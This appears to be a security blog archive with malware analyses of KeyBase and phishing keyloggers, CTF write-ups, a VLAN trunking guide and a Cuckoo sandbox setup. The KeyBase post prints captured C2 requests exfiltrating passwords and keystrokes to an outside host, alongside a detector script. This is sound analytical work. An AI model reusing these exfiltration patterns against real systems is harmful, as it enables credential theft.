Monday, October 12, 2015

Keybase Logger/Clipboard/CredsStealer campaign

While checking my email the other day I came across a phishing email that seemed quite suspicious; see the screenshot below:
It came with a compressed file named Product_details.gz which, when extracted, presented a file named Payment_45476.scr. This file is a Windows executable compiled for .NET, so it was opened with a tool called ILSpy in order to analyze its inner workings.
- Looking at its main function, it seems it creates two threads:
The function below looks to be using a primitive form of obfuscation that consists of reversing strings.
Looking at the function below, the malware uses an Encryption class that handles the decryption of several strings found throughout the code:

Looking at the next function, it seems it invokes the DecryptText function declared on the Encryption class.
The decoded data corresponds to the imports the malware will be using:
  • CreateProcessA
  • GetThreadContext
  • SetThreadContext
  • Wow64SetThreadContext
  • ReadProcessMemory
  • WriteProcessMemory
  • NtUnmapViewOfSection
  • VirtualAllocEx
  • ResumeThread
Taken together, this is the set of APIs typically used for process hollowing: a process is created suspended, its image is unmapped and replaced in memory, and the thread context is pointed at the new code before the thread is resumed.
When this sample was executed it was clear it had malicious intent. It established persistence by copying itself to %AllUsersProfile%\Important.exe and setting an autorun key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The malware names itself "Important.exe", which, looking at the code, is a static value set by the author. See below for the registry and file activity:
 [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe     [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]
 [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe

The malware then starts to reach out to its C2. The requests indicate the malware has the following capabilities:

  • Takes a screenshot of the current window
  • Acts as a keylogger and credential stealer
  • Captures clipboard content

 GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM HTTP/1.1
 "steals passwords from chrome password cache"
 GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY HTTP/1.1
 "it has keylogging capabilities"
 GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM HTTP/1.1
 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1
 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930
 Host: examgist.com
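A small Python detector for the C2 pattern above, added here as an example and not part of the original post: it flags any request under /keybase/, names the capability from the type parameter exactly as the captured traffic uses it, and redacts the stolen password and keystroke fields before they reach an alert. The one-line "method path host" log format is an assumption; the request lines are the ones captured above.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log excerpt: the request lines captured above plus one benign
# WordPress asset request, each reduced to "<method> <path> <host>".
SAMPLE_REQUESTS = [
    "GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM examgist.com",
    "GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome"
    "&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY examgist.com",
    "GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter"
    "&keystrokestyped=teststringt&machinetime=12:00%20AM examgist.com",
    "POST /wp-includes/css/keybase/image/upload.php examgist.com",
    "GET /wp-includes/css/style.css example.org",
]

# What each 'type' value means, as seen in the traffic above.
CAPABILITY = {"notification": "beacon", "passwords": "credential theft", "keystrokes": "keylogging"}
# Fields carrying the victim's stolen data: keep them out of alerts and SIEM indexes.
SECRET_FIELDS = ("password", "keystrokestyped")

def classify(request):
    """Return an alert dict for a KeyBase C2 request, or None if the request is unrelated."""
    method, path, host = request.split()
    url = urlsplit(path)
    if "/keybase/" not in url.path:
        return None
    qs = {k: v[0] for k, v in parse_qs(url.query).items()}
    if method == "POST" and url.path.endswith("/image/upload.php"):
        capability = "screenshot upload"
    else:
        capability = CAPABILITY.get(qs.get("type"), "unknown keybase request")
    # Keep victim/application context for triage but redact the captured secrets themselves.
    fields = {k: ("<redacted>" if k in SECRET_FIELDS else v) for k, v in qs.items()}
    return {"host": host, "capability": capability, "fields": fields}

def scan(requests):
    """Run classify() over a batch of request lines and keep only the hits."""
    return [alert for alert in map(classify, requests) if alert]
```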

Looking further into the C2 callbacks, it was noticed that the directory the screenshots were uploaded to was world readable. See sample below:
The login panel was also available:
In conclusion, this malware is considered primitive based on its design; however, it can certainly cause damage. Its keylogging, screen capture and credential stealing capabilities make it very attractive to skiddies. Thank you for reading.


MD5:
7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr
78c4256eb2003db620a45adba44f404c  Order_34002.gz
9dada7b67f5066e6f5d394222240beb9  Product_details.gz

C2:
http://examgist[.]com/wp-includes/css/keybase/login.php


VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/


Sunday, September 27, 2015

Flare Challenge 1

This was my first time playing the Flare-On challenge and I wanted to know how fun it was, so I got the first challenge. It came as a file named Flare-On_start_2015.exe; on executing this file it drops an additional file named i_am_happy_you_are_to_playing_the_flareon_challenge.exe. So let's begin:

- First I wanted to know what type of file it was, so I ran the file command against it:
 ubuntu@nu11byt3s:/mnt/malware-repo/flare$ file i_am_happy_you_are_to_playing_the_flareon_challenge.exe  
 i_am_happy_you_are_to_playing_the_flareon_challenge.exe: PE32 executable (console) Intel 80386, for MS Windows  

- Good, it seems it's a Windows binary, so I went ahead and ran it to see what it was like:
- It seems this binary performs some authentication, possibly related to a key. So let's open the binary in IDA Pro and see how it looks in there:
- The section above illustrates the part of the program that processes the input. The input is saved at byte_402158 after the call to ReadFile is executed. The next instruction is a XOR that zeroes out ecx, and after the XOR there is a section which looks like an encoding routine; let's take a closer look:
Looking at the loc_40104D region, the program moves a byte from the byte_402158 region into the lower byte of eax (AL) and XORs it with the value 7D. The XORed AL value is then compared with the byte at byte_402140 indexed by ecx. If the comparison succeeds it increases ecx by one and checks whether ecx is 24; if not, it goes back to the beginning of the loop. Once the loop reaches 24 it falls through to the section that prints "you are success".

After this analysis I opened up the binary in Immunity Debugger and placed a breakpoint on the XOR operation described above. Once the input was entered (I used "AAAA") I went ahead and located our key by right clicking -> Follow in Dump -> Address constant on the following instruction, which reads from [ECX+402140]:
 00401055 |. 3A81 40214000 |CMP AL,BYTE PTR DS:[ECX+402140]  

This automatically shows the location where the encoded key resides as well as the data from our input. See below:
As we can see, our encoded key covers 24 bytes starting from address 00402140. I then created an Immunity plugin to acquire the key; see the script in action below:
I called my plugin myplugin and it takes 2 parameters: the first parameter is the start address of the key, the second parameter is the end address of the key. See the source code below:
#!/usr/bin/python
# Immunity Debugger PyCommand: recover the key by undoing the XOR 0x7D the
# binary applies before comparing against the 24-byte table at 00402140.
# Usage from the Immunity command bar: !myplugin 00402140 00402158
import immlib

imm = immlib.Debugger()

def usage():
    imm.log("Usage: !myplugin [startingaddr] [endingaddr]")

def main(args):
    # Both addresses are given in hex; the end address is exclusive
    if len(args) < 2:
        usage()
        return "missing arguments"
    startingAddr = int(args[0], 16)
    length = int(args[1], 16) - startingAddr
    key = []
    for i in range(length):
        # Read one encoded byte from the debuggee and XOR it back to plaintext
        memchar = imm.readMemory(startingAddr + i, 1)
        key.append(chr(ord(memchar) ^ 0x7d))
    imm.log("key is %s" % "".join(key))
    return "key was found ^_^"


Thank you for reading and see you next time. 
Thursday, September 10, 2015

How to Configure Vlan trunking between Cisco switch and ESX host

This blog post gives step by step instructions on how to set up VLAN trunking between a Cisco switch and an ESX host. So let's begin:

Device list: 
Cisco catalyst 3560 switch 
Vmware esxi 5.5.0

- Simple network diagram below:
- First we need to perform the configuration on the Cisco switch. Below are the commands used; the trunk only carries VLAN 10, DTP negotiation and CDP are disabled on the port, and portfast trunk puts the port straight into forwarding:

interface FastEthernet0/7
 description link to trunk to esx vswitch 
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 10
 switchport mode trunk
 switchport nonegotiate
 no cdp enable
 spanning-tree portfast trunk

- Second is the setup of the ESX part. First we need to create a vSwitch. To create a vSwitch, go to the Networking tab in the ESX management console, click Add Networking and choose Virtual Machine as the connection type.
- The next menu allows you to create a vSwitch. Create a new vSwitch and choose the NIC that will be used by this switch; in this example it is vmnic1. Then click Next.
- In the section above a vSwitch named Malware-lab was created. In the second option, VLAN ID, the VLAN number to be set up needs to be declared; in this case it is VLAN 10. Once these settings are saved, just perform a ping between the endpoints and they should be able to communicate.

Monday, September 7, 2015

MMA CTF "howtouse" "cannotberun" challenge writeup

howtouse challenge:

- Looking at the file, it seems it's a Windows DLL. Looking at its export section, it contains an interesting export that might give us a lead: "fnhowtouse(int)".
- Using OllyDbg I loaded the DLL and ran the export with a parameter of 1. Once it took me to the beginning of its execution I noticed a series of MOV operations referencing the area of memory below, which seemed a bit suspicious.

CPU Dump
Address   Hex dump                                         ASCII
71061000  B8 01 00 00|00 C2 0C 00|CC CC CC CC|CC CC CC CC| ¸   Â ÌÌÌÌÌÌÌÌ
71061010  B8 61 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸a   ÃÌÌÌÌÌÌÌÌÌÌ
71061020  B8 62 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸b   ÃÌÌÌÌÌÌÌÌÌÌ
71061030  B8 63 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸c   ÃÌÌÌÌÌÌÌÌÌÌ
71061040  B8 64 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸d   ÃÌÌÌÌÌÌÌÌÌÌ
71061050  B8 65 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸e   ÃÌÌÌÌÌÌÌÌÌÌ
71061060  B8 66 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸f   ÃÌÌÌÌÌÌÌÌÌÌ
71061070  B8 41 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸A   ÃÌÌÌÌÌÌÌÌÌÌ
71061080  B8 4D 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸M   ÃÌÌÌÌÌÌÌÌÌÌ
71061090  B8 30 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸0   ÃÌÌÌÌÌÌÌÌÌÌ
710610A0  B8 31 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸1   ÃÌÌÌÌÌÌÌÌÌÌ
710610B0  B8 32 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸2   ÃÌÌÌÌÌÌÌÌÌÌ
710610C0  B8 33 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸3   ÃÌÌÌÌÌÌÌÌÌÌ
710610D0  B8 34 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸4   ÃÌÌÌÌÌÌÌÌÌÌ
710610E0  B8 37 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸7   ÃÌÌÌÌÌÌÌÌÌÌ
710610F0  B8 38 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸8   ÃÌÌÌÌÌÌÌÌÌÌ
71061100  B8 39 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸9   ÃÌÌÌÌÌÌÌÌÌÌ
71061110  B8 7B 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸{   ÃÌÌÌÌÌÌÌÌÌÌ
71061120  B8 7D 00 00|00 C3 CC CC|CC CC CC CC|CC CC        ¸}   ÃÌÌÌÌÌÌÌÌ

- Looking at the memory region above, there is a pattern: the first byte is B8 (mov eax, imm32), the next byte is an ASCII char, and the stub ends with a return. Since I noticed these chars could be part of the key, I figured the region could be used to build the key later on.

- Following the execution of the program, the memory region above was indeed used to build the key. What I did was to put a breakpoint on the following instruction and wait for the program to hit it:

CPU Disasm
Address   Hex dump          Command                                  Comments
71061276  |.  C78424 B40000 MOV DWORD PTR SS:[LOCAL.0],71061120      ; Entry point

Once it hit the breakpoint I went to analyze the memory at LOCAL.0. To my surprise it pointed at the last part of the key: each dword in the dump below is the address of one of the stubs above.

CPU Dump
Address   Hex dump                                         ASCII
0012FE90  80 10 06 71|80 10 06 71|70 10 06 71|10 11 06 71| € q€ qp q q
0012FEA0  60 10 06 71|30 10 06 71|E0 10 06 71|40 10 06 71| ` q0 qà q@ q
0012FEB0  00 11 06 71|90 10 06 71|30 10 06 71|10 10 06 71|   q q0 q q
0012FEC0  90 10 06 71|90 10 06 71|A0 10 06 71|60 10 06 71|  q q q` q
0012FED0  30 10 06 71|F0 10 06 71|E0 10 06 71|A0 10 06 71| 0 qð qà q q
0012FEE0  B0 10 06 71|D0 10 06 71|00 11 06 71|E0 10 06 71| ° qÐ q qà q
0012FEF0  40 10 06 71|F0 10 06 71|F0 10 06 71|40 10 06 71| @ qð qð q@ q
0012FF00  00 11 06 71|50 10 06 71|50 10 06 71|E0 10 06 71|   qP qP qà q
0012FF10  50 10 06 71|60 10 06 71|10 10 06 71|00 11 06 71| P q` q q q
0012FF20  50 10 06 71|00 11 06 71|20 10 06 71|C0 10 06 71| P q q qÀ q
0012FF30  B0 10 06 71|50 10 06 71|40 10 06 71|F0 10 06 71| ° qP q@ qð q
0012FF40  20 11 06 71|                                       q

All that is left at this point is to decode each entry one by one until the key is revealed.
key: MMA{fc7d90ca001fc8712497d88d9ee7efa9e9b32ed8}



"cannotberun" challenge: this challenge was about fixing a corrupted PE header. Once the header was fixed, just run the program and it gives you the key.

key: MMA{7a35hxb9q81fsg6}

Wednesday, October 15, 2014

phish campaign named "Payment Advice "


This post will be my first attempt to write about malware analysis, since I'm kinda new in this arena, so bear with me :)
  • I came across the following file that was sent via email
    • Filename: 9757f0417b34d3029876c6e715c81935  Payment Advice.zip
      • Unzipped file: a14b8cf65e2195d228b9b982e9e4d54c  Payment Advice.exe
    • Dropper site: woof:://tundecube[.]com/Payment%20Advice.zip
Once the file is executed it performs the following actions on the system:
  • It drops the following files:
    • side.exe (a14b8cf65e2195d228b9b982e9e4d54c) in %AppData%\Microsoft\Windows\Templates\
    • WindowsUpdate.exe (a14b8cf65e2195d228b9b982e9e4d54c) in %AppData%
    • pid.txt (e22dd5dabde45eda5a1a67772c8e25dd) in %AppData%
    • pidloc.txt (cc02e1e3d512cb89ab8fce39614e7260) in %AppData%
  • It performs the following operations on the registry:
    • It sets side.exe to run at startup:
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\side  =  C:\Users\Peter\AppData\Roaming\Microsoft\Windows\Templates\side.exe
    • It sets WindowsUpdate.exe to run at startup as well, even though it is the same file as side.exe, probably to set up a backup persistence mechanism:
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update  =  C:\Users\Peter\AppData\Roaming\WindowsUpdate.exe
    • It opens a listener on port 49951 on localhost
  • It performs the following connections:
    • 66.171.248.172/whatismyipaddress.com:80
    • 203.169.229.58/ns58.hostingspeed.net:21
    • 203.169.229.58/ns58.hostingspeed.net:2927
On performing deeper analysis of these communications: the malware queries whatismyipaddress in order to gather the victim's public IP address, then it performs an FTP connection to ns58.hostingspeed.net. On this connection it uploads a file called "Logger_Notification_PETER-PC 10.15.2014 1:39:00 PM.txt". See below for the FTP connection and the initial content of the file.

And here are the contents of the uploaded file. I suspect the file is a keylogger that sends logs of the system every 40 minutes:

Once 40 minutes have passed it sends a report of the data it has collected; see below:

This is how this malware operates: it acts as a keylogger and a trojan. Thank you for reading.

Sunday, July 27, 2014

Installing/configuring cuckoo sandbox requirements on ubuntu 14 vm on an esx server

I'm afraid this first post will run a bit long, but I really hope the reader finds it informative and constructive. Here we go...

The first thing we want to do is make sure the Ubuntu box runs the Python version supported by Cuckoo. Cuckoo supports version 2.7; see below:

labuser@MAE-cuckoo:~$ python --version 
Python 2.7.6

With this in mind we proceed to install the various Python libraries needed for a successful install. To make the installation of libraries easier we first install pip:

root@MAE-cuckoo:/home/labuser# apt-get install python-pip

Right after, we install some of the requirements with pip:

root@MAE-cuckoo:/home/labuser# pip install sqlalchemy bson jinja2 yara 

The next library to be installed is dpkt, which is critical for pcap processing. This library needs to be installed from source; one might be able to locate it here.
Once downloaded, decompress it and run the following command:

root@MAE-cuckoo:/home/labuser/cuckoo/dpkt-1.8# python setup.py install 

In the case of yara one needs to download it from its git repo and install from source, but before attempting to install yara a few packages need to be installed; then proceed to perform the installation:

root@MAE-cuckoo:/home/labuser/cuckoo/yara-2.1.0# apt-get install automake libtool

root@MAE-cuckoo:/home/labuser/cuckoo/yara-2.1.0# ./build.sh


Next we will install libvirt. This package needs to be installed from source since it needs to be compiled with ESX support; a good guide on how to install it is here. However, on Ubuntu 14 there is some patching you must do in order to successfully compile libvirt:

In the file /usr/include/linux/if_bridge.h you must add the following include: #include <netinet/ip6.h>

and also run the following command: sed -i -e '/gets is a security/d' grub-core/gnulib/stdio.in.h

Also, if you're planning to install the latest version of libvirt, which is libvirt-1.2.5 at the time of this writing, you also need the following package: libpciaccess-dev. In addition

Then we go ahead and install Django:
root@MAE-cuckoo:/home/labuser/cuckoo/libvirt-1.2.5# apt-get install python-django

Next we install the pefile lib:
root@MAE-cuckoo:/home/labuser/cuckoo# wget --no-check-certificate https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz
root@MAE-cuckoo:/home/labuser/cuckoo/pefile-1.2.10-139# python setup.py install

Next we install volatility:
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# wget https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# python setup.py install 

Next we configure tcpdump so it can be run from a non-root account, granting the binary only the raw-socket and network-admin capabilities it needs instead of running it as root:
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump

Next we create the cuckoo user and group, which is the account cuckoo will run under:
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# adduser cuckoo
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# groupadd cuckoogrp
root@MAE-cuckoo:/home/labuser/cuckoo/volatility-2.3.1# usermod -a -G cuckoogrp cuckoo

Now we are ready to download/install cuckoo, which can be downloaded here. Once downloaded, the configuration is pretty straightforward; see here.

Thanks for reading and stay tuned for the next post, which will be about preparing VMs for the cuckoo environment.